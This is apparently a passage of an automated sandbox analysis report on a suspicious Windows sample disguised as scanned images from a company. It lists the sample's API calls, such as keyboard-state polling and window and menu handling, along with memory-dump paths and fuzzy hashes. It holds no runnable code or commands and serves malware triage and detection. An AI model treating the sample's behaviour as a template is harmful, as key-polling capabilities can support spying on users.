                                                        • GetKeyState.USER32(000000A0), ref: 00A80649
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00A80678
                                                        • GetKeyState.USER32(000000A1), ref: 00A80689
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00A806B5
                                                        • GetKeyState.USER32(00000011), ref: 00A806C3
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00A806EC
                                                        • GetKeyState.USER32(00000012), ref: 00A806FA
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00A80723
                                                        • GetKeyState.USER32(0000005B), ref: 00A80731
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: 9bef45cf49d68139135353215ab9217981dc64eaa48febb2bc30806abfc4a882
                                                        • Instruction ID: d12964db453d36cdb5bb3784aa4494797c1ab85c7af71d65c7ee641846a12f41
                                                        • Opcode Fuzzy Hash: 9bef45cf49d68139135353215ab9217981dc64eaa48febb2bc30806abfc4a882
                                                        • Instruction Fuzzy Hash: 5D51EC70A0478419FB79FBB08955FEABFB49F01380F08859DD5C2561C2EAA49B4CCF61
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000001), ref: 00A7C746
                                                        • GetWindowRect.USER32(00000000,?), ref: 00A7C758
                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00A7C7B6
                                                        • GetDlgItem.USER32(?,00000002), ref: 00A7C7C1
                                                        • GetWindowRect.USER32(00000000,?), ref: 00A7C7D3
                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00A7C827
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00A7C835
                                                        • GetWindowRect.USER32(00000000,?), ref: 00A7C846
                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00A7C889
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00A7C897
                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A7C8B4
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00A7C8C1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                        • String ID:
                                                        • API String ID: 3096461208-0
                                                        • Opcode ID: ae08a674128cf7e48e6981eddc99e231bee6d714ce8580d34fdc115009bc1dae
                                                        • Instruction ID: 090c1352a3abb1c6ab258efa89a220f15625b8173e3a89050c01b158a78e75fd
                                                        • Opcode Fuzzy Hash: ae08a674128cf7e48e6981eddc99e231bee6d714ce8580d34fdc115009bc1dae
                                                        • Instruction Fuzzy Hash: D1513E71B00205AFDB18CFA9DD89AAEBBBAEB89310F14C12DF51AD72D0D7709D018B50
                                                        APIs
                                                          • Part of subcall function 00A21B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A22036,?,00000000,?,?,?,?,00A216CB,00000000,?), ref: 00A21B9A
                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00A220D3
                                                        • KillTimer.USER32(-00000001,?,?,?,?,00A216CB,00000000,?,?,00A21AE2,?,?), ref: 00A2216E
                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00A5BEF6
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A216CB,00000000,?,?,00A21AE2,?,?), ref: 00A5BF27
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A216CB,00000000,?,?,00A21AE2,?,?), ref: 00A5BF3E
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A216CB,00000000,?,?,00A21AE2,?,?), ref: 00A5BF5A
                                                        • DeleteObject.GDI32(00000000), ref: 00A5BF6C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                        • String ID:
                                                        • API String ID: 641708696-0
                                                        • Opcode ID: 17c24e681ffe801b089509843d251b0168bffd543b99b3b8318d66fce0fd6bfe
                                                        • Instruction ID: d3bd519dd4aa6ffbe130221a799664930ed606f13b3646cd27b12aea8feaf8b5
                                                        • Opcode Fuzzy Hash: 17c24e681ffe801b089509843d251b0168bffd543b99b3b8318d66fce0fd6bfe
                                                        • Instruction Fuzzy Hash: 64618D31114661EFCB39DF98ED88B29B7F1FB51312F108938E9425A9A0C771AC96DF90
                                                        APIs
                                                          • Part of subcall function 00A225DB: GetWindowLongW.USER32(?,000000EB), ref: 00A225EC
                                                        • GetSysColor.USER32(0000000F), ref: 00A221D3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ColorLongWindow
                                                        • String ID:
                                                        • API String ID: 259745315-0
                                                        • Opcode ID: 57ad8e1e2725b6f040c782bb29017a7093c063464e5c25100e78a17952947645
                                                        • Instruction ID: 32e216f1fd6ae64f22de523a9b15679d7ce1c801c662e855ad1d232743e2e794
                                                        • Opcode Fuzzy Hash: 57ad8e1e2725b6f040c782bb29017a7093c063464e5c25100e78a17952947645
                                                        • Instruction Fuzzy Hash: 69419F31100650EEDB259FACEC88BB93B65EB06331F144375FE659A1E6C7328C42DB61
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,00AAF910), ref: 00A8AB76
                                                        • GetDriveTypeW.KERNEL32(00000061,00ADA620,00000061), ref: 00A8AC40
                                                        • _wcscpy.LIBCMT ref: 00A8AC6A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                        • API String ID: 2820617543-1000479233
                                                        • Opcode ID: 58afcf296745a123686e35052c70b8eca0eb4300697291d3574b36ca8fe81aa3
                                                        • Instruction ID: 2a77506d5dcdba923f466cc348fe2d97a44ab2d70334eb9262114e509f5c1807
                                                        • Opcode Fuzzy Hash: 58afcf296745a123686e35052c70b8eca0eb4300697291d3574b36ca8fe81aa3
                                                        • Instruction Fuzzy Hash: F4519C315083019FD714EF58D981EAAB7A5FFA0700F14482EF486972A2EB31DD0ACB53
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00AA896E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID: @U=u
                                                        • API String ID: 634782764-2594219639
                                                        • Opcode ID: 77086edc160f8263737404b7436cda8e9af3132b9bc91a30a42afde6303e7778
                                                        • Instruction ID: 63647f04d51bea5a1c90c8b3b235061943faec51432fccee0d12d1ab21309e71
                                                        • Opcode Fuzzy Hash: 77086edc160f8263737404b7436cda8e9af3132b9bc91a30a42afde6303e7778
                                                        • Instruction Fuzzy Hash: D951B430600245BFDF34DF68CC89BAA7BA5BB07390F604526F511E71E1DF79A9808B81
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00A5C547
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A5C569
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A5C581
                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00A5C59F
                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A5C5C0
                                                        • DestroyIcon.USER32(00000000), ref: 00A5C5CF
                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A5C5EC
                                                        • DestroyIcon.USER32(?), ref: 00A5C5FB
                                                          • Part of subcall function 00AAA71E: DeleteObject.GDI32(00000000), ref: 00AAA757
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                        • String ID: @U=u
                                                        • API String ID: 2819616528-2594219639
                                                        • Opcode ID: fe4cd00a7550c45eca9b886cb100d704a6b9ceff96a447db41c5a12dd7efc184
                                                        • Instruction ID: d46aa3398b97d548786bdad31dbae71da07b6f5235ffeb9a8cb089d71198d0f2
                                                        • Opcode Fuzzy Hash: fe4cd00a7550c45eca9b886cb100d704a6b9ceff96a447db41c5a12dd7efc184
                                                        • Instruction Fuzzy Hash: BC517970640319AFDB24DFA8DC45FAA37B5FB59361F100528F902A72A0DB70ED81DB90
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Similarity
                                                        • API ID: __i64tow__itow__swprintf
                                                        • String ID: %.15g$0x%p$False$True
                                                        • API String ID: 421087845-2263619337
                                                        APIs
                                                        • _memset.LIBCMT ref: 00AA73D9
                                                        • CreateMenu.USER32 ref: 00AA73F4
                                                        • SetMenu.USER32(?,00000000), ref: 00AA7403
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AA7490
                                                        • IsMenu.USER32(?), ref: 00AA74A6
                                                        • CreatePopupMenu.USER32 ref: 00AA74B0
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AA74DD
                                                        • DrawMenuBar.USER32 ref: 00AA74E5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Similarity
                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                        • String ID: 0$F
                                                        • API String ID: 176399719-3044882817
                                                        APIs
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                          • Part of subcall function 00A7B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00A7B0E7
                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00A794F6
                                                        • GetDlgCtrlID.USER32 ref: 00A79501
                                                        • GetParent.USER32 ref: 00A7951D
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A79520
                                                        • GetDlgCtrlID.USER32(?), ref: 00A79529
                                                        • GetParent.USER32(?), ref: 00A79545
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00A79548
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: @U=u$ComboBox$ListBox
                                                        • API String ID: 1536045017-2258501812
                                                        APIs
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                          • Part of subcall function 00A7B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00A7B0E7
                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00A795DF
                                                        • GetDlgCtrlID.USER32 ref: 00A795EA
                                                        • GetParent.USER32 ref: 00A79606
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A79609
                                                        • GetDlgCtrlID.USER32(?), ref: 00A79612
                                                        • GetParent.USER32(?), ref: 00A7962E
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00A79631
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: @U=u$ComboBox$ListBox
                                                        • API String ID: 1536045017-2258501812
                                                        APIs
                                                        • GetParent.USER32 ref: 00A79651
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00A79666
                                                        • _wcscmp.LIBCMT ref: 00A79678
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A796F3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Similarity
                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                        • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 1704125052-1428604138
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A4707B
                                                          • Part of subcall function 00A48D68: __getptd_noexit.LIBCMT ref: 00A48D68
                                                        • __gmtime64_s.LIBCMT ref: 00A47114
                                                        • __gmtime64_s.LIBCMT ref: 00A4714A
                                                        • __gmtime64_s.LIBCMT ref: 00A47167
                                                        • __allrem.LIBCMT ref: 00A471BD
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A471D9
                                                        • __allrem.LIBCMT ref: 00A471F0
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A4720E
                                                        • __allrem.LIBCMT ref: 00A47225
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A47243
                                                        • __invoke_watson.LIBCMT ref: 00A472B4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                        • String ID:
                                                        • API String ID: 384356119-0
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A82A31
                                                        • GetMenuItemInfoW.USER32(00AE6890,000000FF,00000000,00000030), ref: 00A82A92
                                                        • SetMenuItemInfoW.USER32(00AE6890,00000004,00000000,00000030), ref: 00A82AC8
                                                        • Sleep.KERNEL32(000001F4), ref: 00A82ADA
                                                        • GetMenuItemCount.USER32(?), ref: 00A82B1E
                                                        • GetMenuItemID.USER32(?,00000000), ref: 00A82B3A
                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00A82B64
                                                        • GetMenuItemID.USER32(?,?), ref: 00A82BA9
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A82BEF
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A82C03
                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A82C24
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                        • String ID:
                                                        • API String ID: 4176008265-0
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AA7214
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00AA7217
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AA723B
                                                        • _memset.LIBCMT ref: 00AA724C
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AA725E
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00AA72D6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow_memset
                                                        • String ID:
                                                        • API String ID: 830647256-0
                                                        APIs
                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A77135
                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00A7718E
                                                        • VariantInit.OLEAUT32(?), ref: 00A771A0
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00A771C0
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00A77213
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00A77227
                                                        • VariantClear.OLEAUT32(?), ref: 00A7723C
                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00A77249
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A77252
                                                        • VariantClear.OLEAUT32(?), ref: 00A77264
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A7726F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • GetSystemMetrics.USER32(0000000F), ref: 00AAD78A
                                                        • GetSystemMetrics.USER32(0000000F), ref: 00AAD7AA
                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00AAD9E5
                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00AADA03
                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00AADA24
                                                        • ShowWindow.USER32(00000003,00000000), ref: 00AADA43
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00AADA68
                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00AADA8B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Similarity
                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                        • String ID: @U=u
                                                        • API String ID: 1211466189-2594219639
                                                        APIs
                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00A22EAE
                                                          • Part of subcall function 00A21DB3: GetClientRect.USER32(?,?), ref: 00A21DDC
                                                          • Part of subcall function 00A21DB3: GetWindowRect.USER32(?,?), ref: 00A21E1D
                                                          • Part of subcall function 00A21DB3: ScreenToClient.USER32(?,?), ref: 00A21E45
                                                        • GetDC.USER32 ref: 00A5CF82
                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A5CF95
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00A5CFA3
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00A5CFB8
                                                        • ReleaseDC.USER32(?,00000000), ref: 00A5CFC0
                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A5D04B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
